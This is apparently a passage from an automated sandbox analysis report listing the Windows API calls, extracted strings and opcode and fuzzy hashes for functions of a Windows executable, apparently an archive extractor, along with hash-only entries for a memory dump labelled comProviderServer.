              • Opcode ID: 1c1bb98b8ed2afa12d052c246c206f9e4fce938194c4ca4acc3329082b58033b
              • Instruction ID: e54bb50ca1e3ebba78e90fa6de960268ccc73adcf2d2fe497b622261b4f59a4f
              • Opcode Fuzzy Hash: 1c1bb98b8ed2afa12d052c246c206f9e4fce938194c4ca4acc3329082b58033b
              • Instruction Fuzzy Hash: D8316071A4C258AFDB21EF99DCC5D9EBBFCEB86710B2440E6E40497211DE708E40CB91
              APIs
              • __EH_prolog.LIBCMT ref: 00B87579
                • Part of subcall function 00B83B3D: __EH_prolog.LIBCMT ref: 00B83B42
              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00B87640
                • Part of subcall function 00B87BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B87C04
                • Part of subcall function 00B87BF5: GetLastError.KERNEL32 ref: 00B87C4A
                • Part of subcall function 00B87BF5: CloseHandle.KERNEL32(?), ref: 00B87C59
              Similarity
              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
              • String ID: SeRestorePrivilege$SeSecurityPrivilege
              • API String ID: 3813983858-639343689
              • Opcode ID: 4946e9b71a21afde1535802afe95da29c4d41cea7f0414ef9e8bfe8406775958
              • Instruction ID: 8cf009eed4c9884be19ba3bb84cdacb096b13e024e2763d8e56041048fdcc698
              • Opcode Fuzzy Hash: 4946e9b71a21afde1535802afe95da29c4d41cea7f0414ef9e8bfe8406775958
              • Instruction Fuzzy Hash: 6F319C71948248AEDF20FB68DC41FEE7BE9EF14758F1041A9F445A71A2DFB08A44C7A0
              APIs
                • Part of subcall function 00B8130B: GetDlgItem.USER32(00000000,00003021), ref: 00B8134F
                • Part of subcall function 00B8130B: SetWindowTextW.USER32(00000000,00BB35B4), ref: 00B81365
              • EndDialog.USER32(?,00000001), ref: 00B9A4B8
              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00B9A4CD
              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B9A4E2
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: ASKNEXTVOL
              • API String ID: 445417207-3402441367
              • Opcode ID: cf35a8f7c4b3d573049ba7e671e6d3ac9f2a36b79a8847c500abc1bc5499a8f7
              • Instruction ID: 6058576553e512e7e0e7e5f169b324b0e694d06bfa4c159c3b16d191469f98b9
              • Opcode Fuzzy Hash: cf35a8f7c4b3d573049ba7e671e6d3ac9f2a36b79a8847c500abc1bc5499a8f7
              • Instruction Fuzzy Hash: 631196322442507FDA21AFA8DC8DF667BEDEB46700F2004A5F2419B3B1CBE19941DB63
              Similarity
              • API ID: __fprintf_l_strncpy
              • String ID: $%s$@%s
              • API String ID: 1857242416-834177443
              • Opcode ID: 513ba32c814811e28b7f60ee32f38f35b1b1891c75be377092e460930357898d
              • Instruction ID: b83f323915ccd1dacb74973225bf90daf3077938e8d83cb0f51000a5ed2ae3aa
              • Opcode Fuzzy Hash: 513ba32c814811e28b7f60ee32f38f35b1b1891c75be377092e460930357898d
              • Instruction Fuzzy Hash: 53215E72540209ABEF20EEA4CC46FEE7BE8EF05700F1405A2FE15961B2E371EA55DB51
              APIs
                • Part of subcall function 00B8130B: GetDlgItem.USER32(00000000,00003021), ref: 00B8134F
                • Part of subcall function 00B8130B: SetWindowTextW.USER32(00000000,00BB35B4), ref: 00B81365
              • EndDialog.USER32(?,00000001), ref: 00B9A9DE
              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00B9A9F6
              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00B9AA24
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: GETPASSWORD1
              • API String ID: 445417207-3292211884
              • Opcode ID: d80628c94edf9877cf817dc52b59b4467b428b0169da7a2fd324800170c7227f
              • Instruction ID: 6d5fdaeec3fcdb415dc41c5b67d15d4ac5512f5e28d3bcea2f88d3090a25cf7f
              • Opcode Fuzzy Hash: d80628c94edf9877cf817dc52b59b4467b428b0169da7a2fd324800170c7227f
              • Instruction Fuzzy Hash: 541104329401187BDF21AA649D89FFA7BECFB49711F0000B1FA45B7091C6A19951D7B2
              APIs
              • _swprintf.LIBCMT ref: 00B8B51E
                • Part of subcall function 00B8400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B8401D
              • _wcschr.LIBVCRUNTIME ref: 00B8B53C
              • _wcschr.LIBVCRUNTIME ref: 00B8B54C
              Similarity
              • API ID: _wcschr$__vswprintf_c_l_swprintf
              • String ID: %c:\
              • API String ID: 525462905-3142399695
              • Opcode ID: bf4e03aee22c7983e286e0cd740ba3bdf68e8303af5dfb0b0dd5457cd7787b72
              • Instruction ID: 239a2a3eeb19ac63953613a7343062433008bacf6910a8e7c59a1e3d22c9d924
              • Opcode Fuzzy Hash: bf4e03aee22c7983e286e0cd740ba3bdf68e8303af5dfb0b0dd5457cd7787b72
              • Instruction Fuzzy Hash: 87012D63904311BACB30BB799C82CABB7ECEEB6760B504496F855C60A1FB30D940C3A1
              APIs
              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00B8ABC5,00000008,?,00000000,?,00B8CB88,?,00000000), ref: 00B906F3
              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00B8ABC5,00000008,?,00000000,?,00B8CB88,?,00000000), ref: 00B906FD
              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00B8ABC5,00000008,?,00000000,?,00B8CB88,?,00000000), ref: 00B9070D
              Strings
              • Thread pool initialization failed., xrefs: 00B90725
              Similarity
              • API ID: Create$CriticalEventInitializeSectionSemaphore
              • String ID: Thread pool initialization failed.
              • API String ID: 3340455307-2182114853
              • Opcode ID: 3dadbc769d3507bc5236ef86b9eaf593f979b3068f997d21748de876a0169c4a
              • Instruction ID: 7c4707c6a8bde1bbfd293ab18f338d0444e01a9092a99c033033fb449c13df36
              • Opcode Fuzzy Hash: 3dadbc769d3507bc5236ef86b9eaf593f979b3068f997d21748de876a0169c4a
              • Instruction Fuzzy Hash: 9B1170B1504708AFC7216F65DC84AA7FBECEF95755F10496EF1DA83200DBB16981CB60
              Similarity
              • API ID:
              • String ID: RENAMEDLG$REPLACEFILEDLG
              • API String ID: 0-56093855
              • Opcode ID: f4068608e1aa9d1b4df4df08447f0096c6ffea58f1821ccb8ab634b69d28acf1
              • Instruction ID: f8ab4ff0df4117f0741290e9a46945bd31bbbe351f833d01456faf1b14252d39
              • Opcode Fuzzy Hash: f4068608e1aa9d1b4df4df08447f0096c6ffea58f1821ccb8ab634b69d28acf1
              • Instruction Fuzzy Hash: B901B172A14245AFCF119F69ED84EA67FE9F718381B044472F80993331DEB19850EBA1
              Similarity
              • API ID: __alldvrm$_strrchr
              • String ID:
              • API String ID: 1036877536-0
              • Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
              • Instruction ID: 5ef8b4ed7990ff9ca954e649a50806dbcd6a9797dc06803355044afbe1916cb2
              • Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
              • Instruction Fuzzy Hash: 9DA17731908386AFEF21CF68C8917AEBBE5EF57310F1441EDE4959B381C6388942D754
              APIs
              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00B880B7,?,?,?), ref: 00B8A351
              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00B880B7,?,?), ref: 00B8A395
              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00B880B7,?,?,?,?,?,?,?,?), ref: 00B8A416
              • CloseHandle.KERNEL32(?,?,00000000,?,00B880B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00B8A41D
              Similarity
              • API ID: File$Create$CloseHandleTime
              • String ID:
              • API String ID: 2287278272-0
              • Opcode ID: 43682eb2b23e4e17772c9c4018110ceab9bbddb88761a6d77f38aa9c75cfc415
              • Instruction ID: efa40753db8374f0e0335083373505df4a7a791a1660c1a5dc24564b3a0b89b2
              • Opcode Fuzzy Hash: 43682eb2b23e4e17772c9c4018110ceab9bbddb88761a6d77f38aa9c75cfc415
              • Instruction Fuzzy Hash: 5641D0302483806AE731FF24DC45FAEBBE8AF81700F18099EB5D0931A1D6649A48DB13
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00BA89AD,?,00000000,?,00000001,?,?,00000001,00BA89AD,?), ref: 00BAC0E6
              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BAC16F
              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00BA67E2,?), ref: 00BAC181
              • __freea.LIBCMT ref: 00BAC18A
                • Part of subcall function 00BA8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BAC13D,00000000,?,00BA67E2,?,00000008,?,00BA89AD,?,?,?), ref: 00BA854A
              Similarity
              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
              • String ID:
              • API String ID: 2652629310-0
              • Opcode ID: 96dead7eb8003eabb76cd6059d4d6625a7bb7bd30eb8b44ac5d32e7194412346
              • Instruction ID: bb431287b984ff8cc4107023c8cd26c5963ea6828e7e4d305397b2f918cfff2b
              • Opcode Fuzzy Hash: 96dead7eb8003eabb76cd6059d4d6625a7bb7bd30eb8b44ac5d32e7194412346
              • Instruction Fuzzy Hash: 1B31D072A0420AABDF258F64DC81DEE7BE5EB41710F0402A9FC05E7251EB35CD50CBA0
              APIs
              • ___BuildCatchObject.LIBVCRUNTIME ref: 00BA251A
                • Part of subcall function 00BA2B52: ___AdjustPointer.LIBCMT ref: 00BA2B9C
              • _UnwindNestedFrames.LIBCMT ref: 00BA2531
              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00BA2543
              • CallCatchBlock.LIBVCRUNTIME ref: 00BA2567
              Similarity
              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
              • String ID:
              • API String ID: 2633735394-0
              APIs
              • GetDC.USER32(00000000), ref: 00B99DBE
              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B99DCD
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B99DDB
              • ReleaseDC.USER32(00000000,00000000), ref: 00B99DE9
              Similarity
              • API ID: CapsDevice$Release
              • String ID:
              • API String ID: 1035833867-0
              APIs
              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00BA2016
              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00BA201B
              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00BA2020
                • Part of subcall function 00BA310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00BA311F
              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00BA2035
              Similarity
              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
              • String ID:
              • API String ID: 1761009282-0
              APIs
                • Part of subcall function 00B99DF1: GetDC.USER32(00000000), ref: 00B99DF5
                • Part of subcall function 00B99DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B99E00
                • Part of subcall function 00B99DF1: ReleaseDC.USER32(00000000,00000000), ref: 00B99E0B
              • GetObjectW.GDI32(?,00000018,?), ref: 00B99F8D
                • Part of subcall function 00B9A1E5: GetDC.USER32(00000000), ref: 00B9A1EE
                • Part of subcall function 00B9A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00B9A21D
                • Part of subcall function 00B9A1E5: ReleaseDC.USER32(00000000,?), ref: 00B9A2B5
              Similarity
              • API ID: ObjectRelease$CapsDevice
              • String ID: (
              • API String ID: 1061551593-3887548279
              Similarity
              • API ID: _swprintf
              • String ID: %ls$%s: %s
              • API String ID: 589789837-2259941744
              APIs
              • _free.LIBCMT ref: 00BAAA84
                • Part of subcall function 00BA8849: IsProcessorFeaturePresent.KERNEL32(00000017,00BA8838,00000050,00BB3958,?,00B8CFE0,00000004,00BC0EE8,?,?,00BA8845,00000000,00000000,00000000,00000000,00000000), ref: 00BA884B
                • Part of subcall function 00BA8849: GetCurrentProcess.KERNEL32(C0000417,00BB3958,00000050,00BC0EE8), ref: 00BA886D
                • Part of subcall function 00BA8849: TerminateProcess.KERNEL32(00000000), ref: 00BA8874
              Similarity
              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
              • String ID: *?$.
              • API String ID: 2667617558-3972193922
              APIs
              • __EH_prolog.LIBCMT ref: 00B87730
              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B878CC
                • Part of subcall function 00B8A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B8A27A,?,?,?,00B8A113,?,00000001,00000000,?,?), ref: 00B8A458
                • Part of subcall function 00B8A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B8A27A,?,?,?,00B8A113,?,00000001,00000000,?,?), ref: 00B8A489
              Similarity
              • API ID: File$Attributes$H_prologTime
              • String ID: :
              • API String ID: 1861295151-336475711
              Similarity
              • API ID:
              • String ID: UNC$\\?\
              • API String ID: 0-253988292
              Similarity
              • API ID:
              • String ID: Shell.Explorer$about:blank
              • API String ID: 0-874089819
              APIs
                • Part of subcall function 00B8EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B8EB92
                • Part of subcall function 00B8EB73: GetProcAddress.KERNEL32(00BC81C0,CryptUnprotectMemory), ref: 00B8EBA2
              • GetCurrentProcessId.KERNEL32(?,?,?,00B8EBEC), ref: 00B8EC84
              Strings
              • CryptUnprotectMemory failed, xrefs: 00B8EC7C
              • CryptProtectMemory failed, xrefs: 00B8EC3B
              Similarity
              • API ID: AddressProc$CurrentProcess
              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
              • API String ID: 2190909847-396321323
              APIs
              • CreateThread.KERNEL32(00000000,00010000,00B909D0,?,00000000,00000000), ref: 00B908AD
              • SetThreadPriority.KERNEL32(?,00000000), ref: 00B908F4
                • Part of subcall function 00B86E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B86EAF
              Similarity
              • API ID: Thread$CreatePriority__vswprintf_c_l
              • String ID: CreateThread failed
              • API String ID: 2655393344-3849766595
              APIs
                • Part of subcall function 00B8DA98: _swprintf.LIBCMT ref: 00B8DABE
                • Part of subcall function 00B8DA98: _strlen.LIBCMT ref: 00B8DADF
                • Part of subcall function 00B8DA98: SetDlgItemTextW.USER32(?,00BBE154,?), ref: 00B8DB3F
                • Part of subcall function 00B8DA98: GetWindowRect.USER32(?,?), ref: 00B8DB79
                • Part of subcall function 00B8DA98: GetClientRect.USER32(?,?), ref: 00B8DB85
              • GetDlgItem.USER32(00000000,00003021), ref: 00B8134F
              • SetWindowTextW.USER32(00000000,00BB35B4), ref: 00B81365
              Similarity
              • API ID: ItemRectTextWindow$Client_strlen_swprintf
              • String ID: 0
              • API String ID: 2622349952-4108050209
              APIs
              • WaitForSingleObject.KERNEL32(?,000000FF,00B90A78,?), ref: 00B90854
              • GetLastError.KERNEL32(?), ref: 00B90860
                • Part of subcall function 00B86E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B86EAF
              Strings
              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00B90869
              Similarity
              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
              • String ID: WaitForMultipleObjects error %d, GetLastError %d
              • API String ID: 1091760877-2248577382
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,00B8D32F,?), ref: 00B8DA53
              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00B8D32F,?), ref: 00B8DA61
              Similarity
              • API ID: FindHandleModuleResource
              • String ID: RTL
              • API String ID: 3537982541-834975271
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID: %K
              • API String ID: 0-447823175
              Similarity
              • API ID:
              • String ID: 8e
              • API String ID: 0-1620073548
              Strings
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID: `m
              • API String ID: 0-2956827927
              • Opcode ID: d88b359bfd94f6b1805515ea3602c651e75246abd22060b7b04fa58e0cbb1797
              • Instruction ID: a61536c3c231297cab1a89a42146b36bd676113e8b1aaba98609d0409dcd8cd0
              • Opcode Fuzzy Hash: d88b359bfd94f6b1805515ea3602c651e75246abd22060b7b04fa58e0cbb1797
              • Instruction Fuzzy Hash: C8C1823091DF4ACFF741EB64C8599A9BBE0EF16301F0589B6D40DCB1A2DE29E54887A1
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b0e6a9a4045157cacdfee49b73088c34724127085ce9d98c183f55cc5e66d956
              • Instruction ID: fd9f25df16589436eaebd85a80c066b2ddaad25930c13c596d9f7decee2252e5
              • Opcode Fuzzy Hash: b0e6a9a4045157cacdfee49b73088c34724127085ce9d98c183f55cc5e66d956
              • Instruction Fuzzy Hash: E1023271D19A59CFEB98DF64C459BF8B7A1FF59300F0445BAD00EDB292CA38A844CB91
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9772fe3439166c4e059e3a292146eb7ff993c87f98254d21b4045b33983f5854
              • Instruction ID: a9c8c791a4d236dae37f93ff65283eeab9b446cb5572ecf3b36af02e69ca56ac
              • Opcode Fuzzy Hash: 9772fe3439166c4e059e3a292146eb7ff993c87f98254d21b4045b33983f5854
              • Instruction Fuzzy Hash: 5CE1B130919A4A8FEB41EF68D4596FDBBF0FF5A314F00857AD40DD7292DA38A448CB94
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 77ebce4d87f7bd1c9faddab5a2613712e9f006c92db7013ac69cbe4b7e4f3835
              • Instruction ID: cf06c1d0a061d2714c94dba7c6887e6c77f375d656dc44eee8af41be48a8787b
              • Opcode Fuzzy Hash: 77ebce4d87f7bd1c9faddab5a2613712e9f006c92db7013ac69cbe4b7e4f3835
              • Instruction Fuzzy Hash: 72D11A70919A5ACFEBA4DF18C854BEDB7B1EF15300F0045FAD40DD6291DA38AA88CF91
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 31b341ef70c14e34a1e422544edc78084c6fcc88c2fb73caa04789413924f200
              • Instruction ID: 0b77884c1243c3a69895f8d97d7000c7bfed2a565a4e64e9d27d176b02905759
              • Opcode Fuzzy Hash: 31b341ef70c14e34a1e422544edc78084c6fcc88c2fb73caa04789413924f200
              • Instruction Fuzzy Hash: 40A1133190DF898FEB59DB2898649BA7BE1FF96300F0445BED50DCB192DA34E80987D1
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f299d5b63c9e5ab78a139bb6ed5e559164ee34cd1581f2cae6643a314ec94568
              • Instruction ID: 562aa012c2b133806c65df66f3893748c4ec9ac3c5f9a54e0d7e70edf752a789
              • Opcode Fuzzy Hash: f299d5b63c9e5ab78a139bb6ed5e559164ee34cd1581f2cae6643a314ec94568
              • Instruction Fuzzy Hash: 7BA1B030A19F4A8FEB49DF2898549BAB7E1FF99300F14897ED40EC7192DA34E84587D1
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7739eef7abb65964adaef586f9db1c6f75520f008e01f313648f32fb6d0125d1
              • Instruction ID: 7cab8fa672054652fc31c69b2ddeeb70ec6db74c4ac91de52ca6ca3f456531f6
              • Opcode Fuzzy Hash: 7739eef7abb65964adaef586f9db1c6f75520f008e01f313648f32fb6d0125d1
              • Instruction Fuzzy Hash: B1B16E3094DB8E8FEBA5DF24C8596FA7BB0FF06300F0549BAD409CB192DB3895588791
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f1264e137fe4dab9e913a98d539981f9bf2f219fe779d401e58b72b2deb5c7fd
              • Instruction ID: 114d91f1cc007450edc0e78a68a3ceee02e13dcba7d01ed6832bba754db5c11e
              • Opcode Fuzzy Hash: f1264e137fe4dab9e913a98d539981f9bf2f219fe779d401e58b72b2deb5c7fd
              • Instruction Fuzzy Hash: 7CA1A53590D78A8FEB55EF38C8195EE3BE0FF16315F0445BAE44EC61A2EA34A458C781
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f884870c0ad56b18e8be680e8bd30c7b89739ade58363db39c45ea46b380f382
              • Instruction ID: 2b0207d150737a19fb9ca0f2b9b9a029c4c57f468584de77b8790155c92b3df8
              • Opcode Fuzzy Hash: f884870c0ad56b18e8be680e8bd30c7b89739ade58363db39c45ea46b380f382
              • Instruction Fuzzy Hash: 9981AE31A1DF498BEB48DB1C98519B9B7E2EF99300F14857EE54EC7292CE24EC0687D1
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ec1c11c4d598d7af4c4c1d557e4b9a9c1bae75039e4c6d1ae9571756c08363b9
              • Instruction ID: ae96c3ea3b1827fbc6cd7f47f404d96f09c2c6237af7edf11890c1eda5db29b3
              • Opcode Fuzzy Hash: ec1c11c4d598d7af4c4c1d557e4b9a9c1bae75039e4c6d1ae9571756c08363b9
              • Instruction Fuzzy Hash: AC81703094DB8E8FEB65DB24C8596FA7BB0FF16300F0549BAD409C7192DB389558C791
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e1c44315d39db9d3e2d860c874ba3414dbc00292e362bb07bb996a69d64ed6c1
              • Instruction ID: 043dcf5078d70fa6d4a1f9bb5d1a48037d41f8abfa3f200ef4ac0a5356266c18
              • Opcode Fuzzy Hash: e1c44315d39db9d3e2d860c874ba3414dbc00292e362bb07bb996a69d64ed6c1
              • Instruction Fuzzy Hash: DC816570D09E1ACEFB599B24C455AB9B7A0EF46300F00C9BAD04DDA192DE79A9488BD1
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 792cf144eb310b0ae7585e855acf099c373a45e0635b5cfaac105bfeadb34fff
              • Instruction ID: 2074c79a6713bb57bc55572dee601bf8a01798b99f64394f6ebfdf001c092dc5
              • Opcode Fuzzy Hash: 792cf144eb310b0ae7585e855acf099c373a45e0635b5cfaac105bfeadb34fff
              • Instruction Fuzzy Hash: 4681A030D5964ADFFB95EB38C4586FD7BA0FF0A305F0085BAD40EC6192DA38A548CB85
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f2de526433612770b85a7d4a7c0ddc3e8c2f789cb2ca045a2db502106398e9e1
              • Instruction ID: 8ec4d7b45c3fc4fa34b690072537b9300c894b0ed633422d5a5740a627568484
              • Opcode Fuzzy Hash: f2de526433612770b85a7d4a7c0ddc3e8c2f789cb2ca045a2db502106398e9e1
              • Instruction Fuzzy Hash: 0871C572918A4D8FE784DB6CD855BADBFE1FF9A350F5041BAC00ED7296CBB458058B80
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 475a700d83a483f435740fcf9df3bf41c229c1ade9443f03a5852114b8bb7c79
              • Instruction ID: b1c1d51a200a301a59f428a23a65c47e0e8d7f911445eac32773495afeea1382
              • Opcode Fuzzy Hash: 475a700d83a483f435740fcf9df3bf41c229c1ade9443f03a5852114b8bb7c79
              • Instruction Fuzzy Hash: 14817C3084978E8FEB95DF24C8596FA7BF0FF16305F0045BAE809D6192DB78A558C781
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f940ef868c9aa2efb56698cd56c6ca11b8aa9454184afd631ecd7f6878065812
              • Instruction ID: 80177b15cee860cee4e3774ac45170808b52e05fa5d8326c6d585dc8958eac12
              • Opcode Fuzzy Hash: f940ef868c9aa2efb56698cd56c6ca11b8aa9454184afd631ecd7f6878065812
              • Instruction Fuzzy Hash: 8E71B5B0919F4ADFF745EB6488599F9BBE0FF16314F0589BAD40DCA0A2DA24E448C7D0
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a289328fefdfbbb3ca75df746b3dd2ca1167592bc8ff05353fae6a1534ed10c1
              • Instruction ID: faf8e531acc0db5d0d53be65f30222018f0402e513fcd704fd627da858f2da43
              • Opcode Fuzzy Hash: a289328fefdfbbb3ca75df746b3dd2ca1167592bc8ff05353fae6a1534ed10c1
              • Instruction Fuzzy Hash: 9261FB35609B56CBE701BB78E454DE977A0EF86325B08C977D08DCE0A3CE28A449C7A1
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 11f0ed3c9f7411b9b8b4ec9afbbef1e0b6a247f153f2e6976299342649d43a43
              • Instruction ID: d947a348f6ff6d33f8cc38c0faee95aa47fc1e9aa1ff653818dc1a46514d55a9
